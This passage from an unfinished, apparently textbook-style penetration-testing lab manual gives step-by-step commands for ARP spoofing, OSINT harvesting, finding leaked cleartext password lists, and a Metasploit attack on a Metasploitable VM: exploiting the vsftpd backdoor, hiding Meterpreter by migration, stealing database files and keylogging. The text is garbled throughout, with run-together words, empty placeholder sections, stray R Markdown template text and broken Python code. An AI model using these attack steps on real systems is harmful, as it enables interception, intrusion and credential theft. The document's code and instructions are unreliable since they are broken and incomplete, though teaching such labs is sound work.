Virtual box emulates a virtual network with a virtual gateway. Todetermine the IP address of the default gateway you need to de-termine the ipaddress of kali linux virtual machine and it’s subnetgateway.

##Determining router gateway.

Step 1 Determine the ipaddress and subnet mask by typing theipconfig command.

[Include picture with subnetmask and ipaddress highlighted]

Step 2 Calculate the default gateway, by anding the subnet maskwith you ip address and adding 1. The resulting number if yourdefault gateway.:

51

52 8 Arp Spoofing

Kali Ip 10 0 2 4Kali Ip Binary 0000 1010 0000 0000 0000 0010 0000 0100Subnet Mask 255 255 255 0

Mask in Binary 1111 1111 1111 1111 1111 1111 0Mask & Ip + 1 10 0 2 1

Great now that we have determined the ipaddress of the our virtualgateway. We can trick the metasploitable machine on our virtualnetwork into thinking that we are the default gateway so that allnetwork traffic gets forward by switch to our machine. We do thismy sending packet that falsely tell the metasploitable machine thatmac address of Kali Mahchine is associated the IP-address of thedefault gateway. This means that all traffic that was intended forthe default gateway will now get routed to the Kali Linux box.

[Include ARP spoofing picture below]

Step 3 Type: ip route|grep default , get the router ip

Step 4 On your attacker type: echo ‘1’ >/proc/sys/net/ipv4/ip_forward

Step 5 On the attacker type: arpspoof -i eth0 -t VICTIMIPROUTERIP

Step 6 On the attacker, in another terminal type: urlsnarf -i eth0

Step 7 On the victim open firefox and navigate. If you’ve doneeverything right, now you will see the traffic on the attacker.

Step 8 On the attacker: press ctrl+c on the arp terminal windowto fix the arp table and shut down the attack

##Analyzing the Network Traffic Associated with the ARP re-quest.

Close both VMs and open the packet capture in wireshark. Lookfor the ARP messages between the attacker, victim, and router.

9Open Source Intelligence

Searching is half the fun: life is much more manageable when thought of as a scavenger hunt as opposed to a surprise party.

9.1 IntroductionAn important part of being a penetration tester is gathering asmuch information about the systems as possible. In this lab wewill explore three information gathering tools.

• DNS Lookup tools• Harvester• Maltego• Password Lists

9.2 WhoIsDomain Registrars keep information on their host this informationis public available. The WHOIS linux command also you query thisinformation.

Step 1 Open the terminal and type: whois mit.edu

[Include screenshot]

The whois command will return the information that domain reg-istrar has on the domain. To begin collecting formation on the antheir network.

53

54 9 Open Source Intelligence

9.3 The HarvesterHarvester is a tool that utilizes that lets you search Google, Bing,Linked-In, PGP (public key servers for email addresses that belongto a specific domain.)

Step 1 Open terminal and type theharvester. You will see a listof all the options that the harvester support

[include a screen shot]

Step 2 Run the following command in the linux terminal

theharvester -d microsoft -l 200 -b linkedin

This will list the first reasources that finds by searching linkedinthat are related to the microsoft domain.

[Include screen shot]

9.4 Maltego:The first tool that we will look at is maltego is a liny analysis toolthat allows us to analyze links between entities. These entitiescould be websites, domains, networks.Let’s get started by setting up Maltego.

Step 1 Click on the maltego icon in Kali Linux.

[Include Screen Shot]

Step 2 Create an account. Don’t use your readdress. Use http://www.mailinator.com to create a fake email account.

[You you get blocked, download Opera and enable the VPN. https://www.opera.com/computer/features/free-vpn

[Include Screen Shot]

9.5 List of comprised passwords. 55

Step 3 Select the option to create a new graph.

[Include Screen]

Step 4 Add a domain entity to graph (enter mit.edu in the entity)

[Include Screen]

Step 5 Run all transforms on the entity.

[Include Screen Shot]

Step 6 Install the additonal transforms by selecting transforms->TransformsHub (Install the haveibeenpwned tranform)

[Include Screen Shot]

Step 7: Go back to graph run the haveibeenpwnd. (Transformon people that you have found)

[Screen Shot hide names]

9.5 List of comprised passwords.Great you run maltego and have discovered that someone passwordin contained in one of these list. The question now becomes. Howdo you obtain this list? A list of “clear text” pwned passwordsare available here. https://github.com/philipperemy/tensorflow-1.4-billion-password-analysis You will need a torrentclient.

###BONUS section: Great hackers write their own tools. Seeif you could write a program that takes the email address thatare output by the harvester plugin and test them against, thehaveibeenpwned.com API. Here is the link to the API https://haveibeenpwned.com/API/v2 .

10Creating and Infected File

##Background In this section we will discuss the process of

##Creating

###MSFVenom

###Take Screen Shot

10.0.1 Capturing image from the camera.

webcam_snap -i 1 -v false

[Include screen shot below]

10.1 Creating Malicous Files for Windows##Greating a malicious PDF file

https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/

10.2 Greating a malicious Android APK.In this section we show how you can generate a malicious androidAPK

57

58 10 Creating and Infected File

10.3 EggShell IOS payloadhttps://github.com/neoneggplant/EggShell

11Communicating Securing

##Introduction

In this section we will discuss

##Secure Chat

##Encypting Files.

59

12Tor and Dark Web

12.1 BackgroundTor is network of computers that allows user to browse the webannoymously. It works by relaying the users traffic through seriersof machines. This means that the receiving host can only tell thatthe traffic is coming from last machine in the series but does notknow which machine orginiated the traffic.

[Include picture of Tor Network. Highlight Tor relays extra] Paperhttps://www.nrl.navy.mil/itd/chacs/dingledine-tor-second-generation-onion-router

12.2 Setting up Tor virtual MachineRunning Tor in virtual Machine is not secure since, the host cansee all of the traffic associate with the virtual machine. It is bestto run tor from a USB.

Step 1 Download the tor iso image https://www.torproject.org/download/download-easy.html

Step 2 Create a new virtual machine and install tor. For a quickrefresher, revist the getting setup lab.

61

62 12 Tor and Dark Web

12.3 Annoymous BrowsingStep 3 Once you have completed setting up tor. Login and Launchthe iceweseal browser.

[Include screen shot of how to launch ice weseal browser]

Step 3 Once iceweseal browswer starts you should see the fol-lowing screen. Congratulations you are now connected to the darkweb.

Step 4 www.shodan.io is a webserver engine that allows to searchfor machines are connected to the web. These machines could beip-cameras, webservers with open telnet ports etc. Try browsingannoymously to the Shodan.io.

Step 4 Search for the list of open ip-cameras. By typing webcamesin search box.

[Include screen shot]

Step 5 Click one of the ip-addresses [Include ]

##Tor hidden services and hidden sites. There are some websitesand services that can only be acessed from tor network. Let’s takehttps://www.torproject.org/docs/onion-services.html.en

[Need to build and include a picture]

The database is stored in a distributed hash table. [Include a pic-ture discussing DHT]

13Metasploit

13.1 BackgroundMetasploit is a framework that is Developed by Rapid 7. Thissection we will walk throught the step that an attacker wouldtake to use to break into webserver and database containing thepasswords for the website.

13.2 Using ExploitsStep 1 Start up the metasploitable virtual machine. (This ma-chine that will be webserver that we attack in the this excersizeand get the IPaddress of metasploitable machine by logging in useusername: msfadmin, password: msfadmin. And get the IPaddressby running the ifconfig command. Write it down you need to re-member it for the next step.

[Include Screen Shot]

Step 2 Click on the Metasploit Icon [Include picture]

[Include screen shot Metasploit Console]

Step 3 Metasploit Framework is comprised of collection of mod-ules. These modules contain code that is designed execute a par-ticlar exploit. In this next labs we explore how the modules areimplemented by implementing our own module for this lab we willuse an existing module in metasploit. We will begin by loading the

63

64 13 Metasploit

module that execute the ftp exploit module (This will execute theattack from 2 chapter)

use exploit/unix/ftp/vsftpd_234_backdoor

[include screen shot]

Step 4 Next you want to set the IP-address of the target that youwant to attack.

set TARGET <target-id>

Step 4 Run the command below to use the exploit and uploadthe metasploit payload (Metrepreter):

exploit

[include screenshot ]

13.3 Hide metrepreter process by migrating it.Once the hacker has upload a metasploitable payload they don’tthe user to notice the process and kill it so often the hide themetrepreter process by migrating it.

Step 5 Get a list of the process by running the ps command ps[include screenshot]

Step 6 The process by migrating by running

migrate 682 [Update to match a process in the list]

13.4 Exploring the file systemGreat now that you have ran the exploit and uploaded the metas-ploit payload you should have a reverse shell lets you exploire thefile system on the webserver.

13.5 Key Logging 65

Step 5 Run the pwd command. Notice that it prints the currentdirectory of the program.

[include screenshot]

Step 6 Navigate to directory containing the database file by run-ning the following command

cd /var/lib/mysql/ [include screenshot]

Step 7 Download one of the database files by running the com-mand below:

download [filename] [Include screen shot]

13.5 Key LoggingGreat you have been able to sucesfully get the database file fromthe system. But you don’t know the admin password for the system.This would make really convient for login back into the system, aneven other systems without creating to much noise.

[Metasploit only does keylogging for the process that you are cur-rently in. ] Step 8 Install a keylogger so that you can collect theusernames and password from the system. By running the

[Include Screen shot]

**Step 9** Test the keylogger by logging into the metasploitable virtual machine and running the sudo command. (Username: msfadmin, password: msfadmin)

[Include screenshot]

**Step 7** Open the window containing the meterpeter session. Run the command ```keyscan_dump``. Notice anything?[Include screenshot below]

66 13 Metasploit

<!--chapter:end:14-Metasploit.Rmd-->

#Writing a Metasploit module

##Background

##Setup**Setup 1** Open the terminal and navigate to the metasploit directory by running the```cd ~/.msf4/modules```

**Step 2** Open Visual studio code. (If you haven't )

<!--chapter:end:15-WritingAMetasploitModule.Rmd-->

# Secure Sockets SSL and TLS

## BackgroundIn this section we discuss the TLS security protocol in detail. We will go through the protocol in detail we also use wireshark to look at sample TLS session. For additonal details on TLS you can read the TLS formal specification https://tools.ietf.org/html/rfc5246#section-8.1.2.

13.5 Key Logging 67

### Key Exchange.

###How are keys derived from the Pre-Master Secret.The length of the pre-master secret varies depending on type of key exchange algorithm that is used. However, to ensure that the message is both authentic and confidential a fix length messsage autheication code key and fix length messsage encryption key. We need these keys for both the client and server. TLS solves issue by deriving the fix length master secret from a variable lenght pre-master secret.

```python

master_secret = PRF(pre_master_secret, "master secret",ClientHello.random + ServerHello.random)[0..47];

The code below shows a sample python program that implementsthe PRF function above:

This master_secret key is the cutup into 4 keys:

client_write_MAC_key[SecurityParameters.mac_key_length]server_write_MAC_key[SecurityParameters.mac_key_length]client_write_key[SecurityParameters.enc_key_length]server_write_key[SecurityParameters.enc_key_length]

PRF(secret, label, seed) = P_<hash>(secret, label + seed)

P_hash(secret, seed) = HMAC_hash(secret, A(1) + seed) +HMAC_hash(secret, A(2) + seed) +HMAC_hash(secret, A(3) + seed) + ...

where + indicates concatenation.A() is defined as:

A(0) = seedA(i) = HMAC_hash(secret, A(i-1))

HMAC = Hash-based Message Authentication Code.

68 13 Metasploit

def PRF(secret, label, seed)requireLength = 48masterkey = ''secSeed = label + seedwhile(len(masterkey) <- 48):secSeed = hmac.new(secret,secSeed).hexdigest()masterkey += secSeed

return masterkey

13.6 Writing a SSL Client

import socketimport ssl

hostname = 'www.python.org'context = ssl.create_default_context()sock = socket.create_connection((hostname, 443))secureSocket = context.wrap_socket(sock, server_hostname=hostname)print(secureSocket.recvfrom(1024))

##Writing an SSL server

context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)context.load_cert_chain('/path/to/certchain.pem', '/path/to/private.key')sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)sock.bind(('127.0.0.1', 8443))sock.listen(1)secureSocket= context.wrap_socket(sock, server_side=True)conn, addr = ssock.accept()

13.7 Challenge 69

13.7 ChallengeNow that you have we discussed TLS you can try running SMTPspoof over a TLS connection.

14Moving through the network

##Domain controller In this lab we extend upd

##Golden Ticket Attacks (Kiwi)

71

15Writing Malicous Javascript

In this lab we will write malicous javascript.

15.1 Obfuscating CodeAfter a hacker has written some malicous code, often want to makeit difficult for someone to reverse engineer their maliware. Thisis done through a process called obfuscation. There are serveralapproaches to doing obfuscation.

base64 encoding.

Other obfuscation tools:

https://obfuscator.io/

15.2 R MarkdownThis is an R Markdown document. Markdown is a simple format-ting syntax for authoring HTML, PDF, and MS Word documents.For more details on using R Markdown see http://rmarkdown.rstudio.com.

When you click the Knit button a document will be generatedthat includes both content as well as the output of any embeddedR code chunks within the document. You can embed an R codechunk like this:

73

74 15 Writing Malicous Javascript

15.3 Including PlotsYou can also embed plots, for example:

Note that the echo = FALSE parameter was added to the codechunk to prevent printing of the R code that generated the plot.

15.4 R MarkdownThis is an R Markdown document. Markdown is a simple format-ting syntax for authoring HTML, PDF, and MS Word documents.For more details on using R Markdown see http://rmarkdown.rstudio.com.

When you click the Knit button a document will be generatedthat includes both content as well as the output of any embeddedR code chunks within the document. You can embed an R codechunk like this:

summary(cars)

## speed dist## Min. : 4.0 Min. : 2.00## 1st Qu.:12.0 1st Qu.: 26.00## Median :15.0 Median : 36.00## Mean :15.4 Mean : 42.98## 3rd Qu.:19.0 3rd Qu.: 56.00## Max. :25.0 Max. :120.00

15.5 Including PlotsYou can also embed plots, for example:

15.5 Including Plots 75

0 50 100 150 200 250 300 350

020

040

060

080

0

temperature

pres

sure

Note that the echo = FALSE parameter was added to the codechunk to prevent printing of the R code that generated the plot.

Bibliography

77